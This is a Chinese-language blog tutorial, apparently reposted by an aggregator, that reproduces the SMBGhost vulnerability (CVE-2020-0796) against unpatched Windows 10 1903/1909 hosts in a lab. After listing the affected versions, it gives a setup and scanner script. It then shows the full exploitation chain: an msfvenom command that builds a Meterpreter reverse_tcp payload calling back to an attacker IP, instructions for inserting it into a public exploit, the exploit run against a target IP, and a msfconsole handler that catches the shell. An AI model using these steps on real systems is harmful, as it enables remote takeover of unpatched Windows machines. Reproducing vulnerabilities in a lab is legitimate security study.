永恒之黑漏洞利用

Posted hxlinux

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了永恒之黑漏洞利用相关的知识,希望对你有一定的参考价值。

CVE-2020-0796

Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。

受影响的系统版本

适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)

漏洞测试-环境准备

技术图片
技术图片
测试文件自取:百度网盘
root

漏洞检测-扫描

技术图片

执行bash脚本一键执行环境准备工作

#!/bin/bash
tar vxf Python-3.8.0.tar.xz
cd Python-3.8.0
 ./configure --prefix=/usr/local/src/python3
make && make install
echo "export PATH=$PATH:/usr/local/src/python3/bin" >>/etc/profile
source /etc/profile
cd ..
unzip SMBGhost-master.zip
unzip SMBGhost_RCE_PoC-master
cd SMBGhost-master
python3.8 scanner.py 192.168.139.110          /*这里IP地址需要更改为自己的靶机地址*/

将框选的所有文件拖到桌面一键运行
root@kali:~/桌面# bash SM-2020-0796.sh

漏洞复现-返回会话

1.生成一个反弹shell的文件输出在当前环境(含exploit.py的目录下)

root@kali:~/桌面# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.139.3 lport=2333 -f py -o shellcode.txt
/*这里的lhost指向自身,lport也随便指定一个自己的IP地址*/

技术图片

使用mousepad打开shellcode.txt将buf改为USER_PYLOAD
技术图片

接着将exploit.py中的USER_PAYLOAD改为shellcode中的代码
技术图片

打开一个终端,执行exploit.py,指定目标机

root@kali:~/桌面# cd SMBGhost_RCE_PoC-master
root@kali:~/桌面/SMBGhost_RCE_PoC-master# python3.8 exploit.py -ip 192.168.139.110

技术图片

打开msfconsole控制台

技术图片

监听shell反弹的端口

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lport 2333      /*这里监听的与之前构造的木马指定的端口一致*/
set lhost 192.168.139.3      /与之前构造的木马IP一致,指向自身/
run

技术图片














以上是关于永恒之黑漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑(CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)

永恒之黑漏洞复现

CVE-2020-0796永恒之黑复现POC EXP以及修复方案

CVE-2020-0796永恒之黑复现POC EXP以及修复方案